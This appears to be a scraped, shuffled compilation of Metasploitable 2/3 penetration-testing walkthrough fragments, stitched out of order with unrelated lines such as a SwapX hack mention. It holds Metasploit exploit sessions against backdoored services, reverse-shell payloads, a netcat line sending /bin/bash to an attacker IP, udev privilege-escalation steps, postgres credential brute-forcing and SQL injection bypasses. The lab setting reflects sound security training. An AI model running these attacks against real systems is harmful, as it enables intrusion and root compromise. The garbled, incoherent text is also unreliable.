LHOST => 192.168.127.159
nc: /bin/nc.traditional /bin/nc /usr/share/man/man1/nc.1.gz, gcc -m32 8572.c -o 8572
msf exploit(usermap_script) > exploit
rapid7/metasploitable3 Wiki. It is inherently vulnerable since it distributes data in plain text, leaving many security holes open.
msf exploit(java_rmi_server) > exploit
For example, noting that the version of PHP disclosed in the screenshot is version 5.2.4, it may be possible that the system is vulnerable to CVE-2012-1823 and CVE-2012-2311 which affected PHP before 5.3.12 and 5.4.x before 5.4.2. [*] Accepted the second client connection
This is Metasploitable2 (Linux) Metasploitable is an intentionally vulnerable Linux virtual machine. The problem with this service is that an attacker can easily abuse it to run a command of their choice, as demonstrated by the Metasploit module usage below. [*] Matching
[*] Scanned 1 of 1 hosts (100% complete)
Cross site scripting on the host/ip field. O/S Command injection on the host/ip field. This page writes to the log.
Keywords: vulnerabilities, penetration testing, Metasploit, Metasploitable 2, Metasploitable 3, pen-testing, exploits, Nmap, and Kali Linux. Introduction: Metasploitable 3 is an intentionally vulnerable Windows Server 2008 R2 server, and it is a great way to learn about exploiting Windows operating systems using Metasploit.
In this lab we learned how to perform reconnaissance on a target to discover potential system vulnerabilities. Id Name
STOP_ON_SUCCESS => true
---- --------------- -------- -----------
Accessing it is easy: In addition to the malicious backdoors in the previous section, some services are almost backdoors by their very nature. For more information on Metasploitable 2, check out this handy guide written by HD Moore. So I'm going to exploit 7 different remote vulnerabilities; here is the list of vulnerabilities. Step 6: On the left menu, click the Network button and change your network adapter settings as follows: Advanced Select: Promiscuous Mode as Allow All Attached, Network Setting: Enable Network Adapter and select Ethernet or Wireless. msf auxiliary(tomcat_administration) > run
msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(usermap_script) > set LHOST 192.168.127.159
Redirect the results of the uname -r command into file uname.txt.
THREADS 1 yes The number of concurrent threads
RPORT 1099 yes The target port
A demonstration of an adverse outcome. msf 5> db_nmap -sV -p 80,22,110,25 192.168.94.134. [*] Executing /RuoE02Uo7DeSsaVp7nmb79cq/19CS3RJj.jsp
msf auxiliary(postgres_login) > run
The SwapX project on BNB Chain suffered a hacking attack on February 27, 2023.
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname
Module options (auxiliary/scanner/postgres/postgres_login):
XSS via any of the displayed fields. Module options (exploit/multi/samba/usermap_script):
RHOST yes The target address
RPORT 3632 yes The target port
However, the exact version of Samba that is running on those ports is unknown. For instance, to use native Windows payloads, you need to pick the Windows target. You will need the rpcbind and nfs-common Ubuntu packages to follow along. We have found the following appropriate exploit: TWiki History TWikiUsers rev Parameter Command Execution. Both operating systems will be running as VMs within VirtualBox. msf2 has an rsh-server running and allowing remote connectivity through port 513. Metasploitable 2 Full Guided Step by step overview.
We don't really want to deprive you of practicing new skills. Payload options (cmd/unix/reverse):
: CVE-2009-1234 or 2010-1234 or 20101234) PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
Let's go ahead. [*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300
The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. -- ----
DVWA contains instructions on the home page and additional information is available at Wiki Pages - Damn Vulnerable Web App. [*] udev pid: 2770
echo 'nc -e /bin/bash 192.168.127.159 5555' >> /tmp/run, nc: connect to 192.168.127.159 5555 from 192.168.127.154 (192.168.127.154) 35539 [35539]
Module options (exploit/multi/misc/java_rmi_server):
Exploit target:
865.1 MB.
During that test we found a number of potential attack vectors on our Metasploitable 2 VM. (Note: A video tutorial on installing Metasploitable 2 is available here.).
Backdoors - A few programs and services have been backdoored. ===================
For this walk-through I use the Metasploit framework to attempt to perform a penetration testing exercise on Metasploitable 2. This is an issue many in infosec have to deal with all the time. exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent VSFTPD v2.3.4 Backdoor Command Execution, msf > use exploit/unix/ftp/vsftpd_234_backdoor
Compatible Payloads
The payload is uploaded using a PUT request as a WAR archive comprising a JSP application. This can be done via brute forcing. SQL injection and XSS via Referer HTTP header. SQL injection and XSS via User-Agent string. Authentication bypass: SQL injection via the username field and password field. SQL injection via the username field and password field. XSS via username field. JavaScript validation bypass. This page gives away the PHP server configuration. Application path disclosure. Platform path disclosure. Creates cookies but does not make them HTML only.
root, msf > use auxiliary/admin/http/tomcat_administration
Then, hit the "Run Scan" button in the .
msf exploit(java_rmi_server) > set LHOST 192.168.127.159
msf auxiliary(telnet_version) > show options
[*] Reading from socket B
What is Metasploit? This is a tool developed by Rapid7 for the purpose of developing and executing exploits against vulnerable systems.
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. We can't check every single IP out there for vulnerabilities so we buy (or download) scanners and have them do the job for us. Pass the udevd netlink socket PID (listed in /proc/net/netlink, typically is the udevd PID minus 1) as argv[1].
---- --------------- -------- -----------
-- ----
Server version: 5.0.51a-3ubuntu5 (Ubuntu). Associated Malware: FINSPY, LATENTBOT, Dridex. Metasploitable 2 is a vulnerable system that I chose to use, as doing this on any other system would be considered hacking and could have bad consequences. We're going to exploit it and get a shell: Due to a random number generator vulnerability, the OpenSSL software installed on the system is susceptible to a brute-force attack. RHOST 192.168.127.154 yes The target address
msf exploit(twiki_history) > set RHOST 192.168.127.154
By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag.
We can now look into the databases and get whatever data we may like.
As the payload is run as the constructor of the shared object, it does not have to adhere to particular Postgres API versions. Distributed Ruby or DRb makes it possible for Ruby programs to communicate on the same device or over a network with each other.
Step 2: Basic Injection. Setting the Security Level from 0 (completely insecure) through to 5 (secure). [*] Writing to socket B
Exploit target:
RHOST => 192.168.127.154
msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
Return to the VirtualBox Wizard now. [*] Reading from socket B
Module options (exploit/linux/postgres/postgres_payload):
The easiest way to get a target machine is to use Metasploitable 2, which is an intentionally vulnerable Ubuntu Linux virtual machine that is designed for testing common vulnerabilities.
- Cisco 677/678 Telnet Buffer Overflow. We're not going to go into the web applications here because, in this article, we're focused on host-based exploitation. RHOST 192.168.127.154 yes The target address
Metasploitable 3 is the updated version based on Windows Server 2008. CVEdetails.com is a free CVE security vulnerability database/information source. [*] Accepted the second client connection
Module options (auxiliary/scanner/smb/smb_version):
The example below uses rpcinfo to identify NFS and showmount -e to determine that the "/" share (the root of the file system) is being exported. Name Disclosure Date Rank Description
Combining Nmap with Metasploit for a more detailed and in-depth scan on the client machine. There are the following kinds of vulnerabilities in Metasploitable 2- Misconfigured Services - A lot of services have been misconfigured and provide direct entry into the operating system. Here are the outcomes. -- ----
msf exploit(unreal_ircd_3281_backdoor) > show options
Metasploit is a free open-source tool for developing and executing exploit code. ---- --------------- -------- -----------
It gives you everything you need, from scanners to third-party integrations, throughout an entire penetration testing lifecycle.
Set the SUID bit using the following command: chmod 4755 rootme. S /tmp/run
Payload options (cmd/unix/interact):
The following command line will scan all TCP ports on the Metasploitable 2 instance: Nearly every one of these listening services provides a remote entry point into the system. 0 Linux x86
whoami
msf exploit(drb_remote_codeexec) > show options
This is Bypassing Authentication via SQL Injection. SRVHOST 0.0.0.0 yes The local host to listen on. whoami
whoami
msf exploit(vsftpd_234_backdoor) > show options
-- ----
meterpreter > background
[+] Backdoor service has been spawned, handling
The results from our nmap scan show that the ssh service is running (open) on a lot of machines. msf exploit(usermap_script) > set RHOST 192.168.127.154
Utilizing login / password combinations suggested by the USER_FILE, PASS_FILE and USERPASS_FILE options, this module tries to validate against a PostgreSQL instance. -- ----
VERBOSE true yes Whether to print output for all attempts
Effectively what happens is that the Name validation is made to always be true by closing off the field with a single quote and using the OR operator.
Id Name
Name Current Setting Required Description
================
To begin using the Metasploit interface, open the Kali Linux terminal and type msfconsole.
Nessus, OpenVAS and Nexpose VS Metasploitable.
Module options (exploit/unix/webapp/twiki_history):
msf exploit(tomcat_mgr_deploy) > set PASSWORD tomcat
[+] 192.168.127.154:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
PASSWORD no The Password for the specified username. Same as login.php.
For your test environment, you need a Metasploit instance that can access a vulnerable target. Metasploitable 2 is available at: [*] Reading from socket B
TWiki is a flexible, powerful, secure, yet simple web-based collaboration platform. 15. USERNAME => tomcat
We're going to use netcat to connect to the attacking machine and give it a shell. Listen on port 5555 on the attacker's machine. Now that all is set up, I just make the exploit executable on the victim machine and run it. Now, for the root shell, check our local netcat listener. A little bit of work on that one, but all the more satisfying! ---- --------------- -------- -----------
-- ----
RHOSTS yes The target address range or CIDR identifier
msf exploit(vsftpd_234_backdoor) > show options
Exploit target:
Exploit target:
msf exploit(twiki_history) > set payload cmd/unix/reverse
Step 3: Always True Scenario. msf exploit(java_rmi_server) > set RHOST 192.168.127.154
At a minimum, the following weak system accounts are configured on the system. Version 2 of this virtual machine is available for download and ships with even more vulnerabilities than the original image. Step 11: Create a C file (as given below) and compile it, using GCC on a Kali machine. payload => cmd/unix/reverse
The web server starts automatically when Metasploitable 2 is booted. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks
Module options (auxiliary/admin/http/tomcat_administration):
This is about as easy as it gets.
The ++ signifies that all computers should be treated as friendlies and be allowed to .
URI => druby://192.168.127.154:8787
msf exploit(tomcat_mgr_deploy) > exploit
Exploiting Samba Vulnerability on Metasploit 2 The screenshot below shows the results of running an Nmap scan on Metasploitable 2.
To download Metasploitable 2, visit the following link. BLANK_PASSWORDS false no Try blank passwords for all users
RHOSTS yes The target address range or CIDR identifier
Browsing to http://192.168.56.101/ shows the web application home page. By discovering the list of users on this system, either by using another flaw to capture the passwd file, or by enumerating these user IDs via Samba, a brute force attack can be used to quickly access multiple user accounts. payload => java/meterpreter/reverse_tcp
LHOST yes The listen address
In this example, Metasploitable 2 is running at IP 192.168.56.101. Step 1: Setup DVWA for SQL Injection.
msf auxiliary(telnet_version) > run